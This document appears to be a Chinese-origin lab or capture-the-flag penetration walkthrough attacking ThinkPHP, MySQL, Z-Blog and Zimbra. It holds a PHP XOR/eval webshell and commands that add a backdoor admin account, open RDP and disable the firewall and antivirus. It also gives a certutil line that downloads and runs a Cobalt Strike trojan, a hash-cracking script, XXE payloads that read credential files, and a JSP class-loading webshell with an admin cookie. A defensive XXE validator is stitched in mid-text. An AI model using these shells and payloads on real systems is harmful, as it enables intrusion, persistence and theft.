ThinkPHP #
Go to port 80 and use a tool to get a shell directly.
```php
<?php
// Repeating-key XOR; applying it twice with the same key returns the original input.
function xorEncryptDecrypt($data, $key) {
    $keyLength = strlen($key);
    $result = '';
    for ($i = 0; $i < strlen($data); $i++) {
        $keyChar = $key[$i % $keyLength];
        $result .= chr(ord($data[$i]) ^ ord($keyChar));
    }
    return $result;
}
$originalData = $_REQUEST["a"];
$key = $_REQUEST["b"];
$encryptedData = xorEncryptDecrypt($originalData, $key);
$decryptedData = xorEncryptDecrypt($encryptedData, $key);
echo @eval($decryptedData);
?>
```

The password is `a`.
flag1 is in the root directory.

```cmd
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
```

Run the following on the target Windows host to allow non-TLS, non-NLA connections:

```powershell
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name SecurityLayer -Value 0
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 0
```

360 is there as soon as you get in; shut it down.
MySQL #
Here Stowaway was used to set up a proxy, and the MySQL credentials could be tried out: root/cslab. Brute-forcing causes too many errors and gets the IP blacklisted (there may have been a hint for this earlier, but there wasn't one when I did it).

Upload the CS trojan to the ThinkPHP directory so it can be downloaded from there; 掩日 was needed here for network-separated loading.

```cmd
certutil -urlcache -f -split http://172.20.57.30/Cld.exe Cld.exe
Cld.exe http://172.20.57.30/Cld.txt
```

After getting the CS session, forward it to msf.
Z-Blog #
An intranet scan found a Z-Blog instance.

```
guid  24d876c8772572cf839674c5a176e41c
user  cslab
pass  6e272dff11557a1e7ad35d0fdf1162c3
email null@null.com
```

Reading the source shows how the hash is generated: simply a double MD5, md5(md5(password) + guid).
```python
import hashlib

# Z-Blog stores md5(md5(password) + guid); both values come from the dumped record.
target_hash = "6e272dff11557a1e7ad35d0fdf1162c3"
guid = "24d876c8772572cf839674c5a176e41c"

with open("/usr/share/wordlists/rockyou.txt", "r", encoding="latin1") as f:
    for line in f:
        password = line.strip()
        inner_md5 = hashlib.md5(password.encode()).hexdigest()
        final_hash = hashlib.md5((inner_md5 + guid).encode()).hexdigest()
        if final_hash == target_hash:
            print(f"[+] Found: {password}")
            break
```
The password turns out to be admin123. Log in to the admin panel and upload this theme package:
- fengyijiu520/Z-Blog-: Z-Blog admin file upload vulnerability
CVE-2019-9670 #
fscan picked up the XXE directly.
- CVE-2019-9670: Zimbra remote code execution vulnerability reproduction | CN-SEC 中文网

Create an XML file in the current directory:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
    </Request>
</Autodiscover>
```

Then test it with curl. The DTD used to read the config file:

```xml
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
```

Send the request to obtain the password.
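As an added defensive example (not from this writeup or from Zimbra): a pre-parse check for an Autodiscover endpoint that fails closed on any DOCTYPE or entity declaration, which is what both payloads above depend on. The namespace and element names are those of the request above; the function names and the sample requests are my own.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET

NS = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"

class UnsafeXml(ValueError):
    """Request carried a DTD/entity declaration or was not well-formed."""

def reject_dtd(doc: str) -> None:
    """Fail closed on any DOCTYPE/entity declaration; nothing external is fetched while checking."""
    p = xml.parsers.expat.ParserCreate()
    # Never resolve parameter entities or an external DTD during the check.
    p.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE {name!r} is not allowed in an Autodiscover request")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXml(f"entity {name!r} (system id {sysid!r}) is not allowed")

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    try:
        p.Parse(doc, True)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeXml(f"malformed XML: {exc}") from exc

def is_safe_xml(doc: str) -> bool:
    try:
        reject_dtd(doc)
        return True
    except UnsafeXml:
        return False

def autodiscover_email(doc: str) -> str:
    """Validate first, then pull EMailAddress out with the stdlib tree parser."""
    reject_dtd(doc)
    node = ET.fromstring(doc).find(f"{{{NS}}}Request/{{{NS}}}EMailAddress")
    if node is None or not node.text:
        raise UnsafeXml("EMailAddress element missing")
    return node.text.strip()

# Constructed samples: a clean request and the XXE request shown above.
CLEAN_REQUEST = (f'<?xml version="1.0"?><Autodiscover xmlns="{NS}"><Request>'
                 '<EMailAddress>user@example.com</EMailAddress></Request></Autodiscover>')
XXE_REQUEST = ('<?xml version="1.0"?><!DOCTYPE xxe [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
               f'<Autodiscover xmlns="{NS}"><Request><EMailAddress>aaaaa</EMailAddress>'
               '<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>')
```

Calling `autodiscover_email(XXE_REQUEST)` raises UnsafeXml at the DOCTYPE, before any element or entity reference is processed.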
- Homework-of-Python/Zimbra_SOAP_API_Manage.py at master · 3gstudent/Homework-of-Python
```jsp
<%!
// ClassLoader subclass that exposes defineClass for a byte array
class U extends ClassLoader {
    U(ClassLoader c) {
        super(c);
    }
    public Class g(byte[] b) {
        return super.defineClass(b, 0, b.length);
    }
}
// Base64 decoding via sun.misc.BASE64Decoder on old JDKs, java.util.Base64 otherwise
public byte[] base64Decode(String str) throws Exception {
    try {
        Class clazz = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
        Class clazz = Class.forName("java.util.Base64");
        Object decoder = clazz.getMethod("getDecoder").invoke(null);
        return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
    }
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
    new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
```

```http
Cookie: ZM_ADMIN_AUTH_TOKEN=0_deccfe0ee19318345a3115f64f8b6f637ac49cbe_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313735333332373330393032383b61646d696e3d313a313b747970653d363a7a696d6272613b7469643d31303a313139303734363932383b
```

Then connect with AntSword; remember to add the Cookie and to ignore the HTTPS certificate.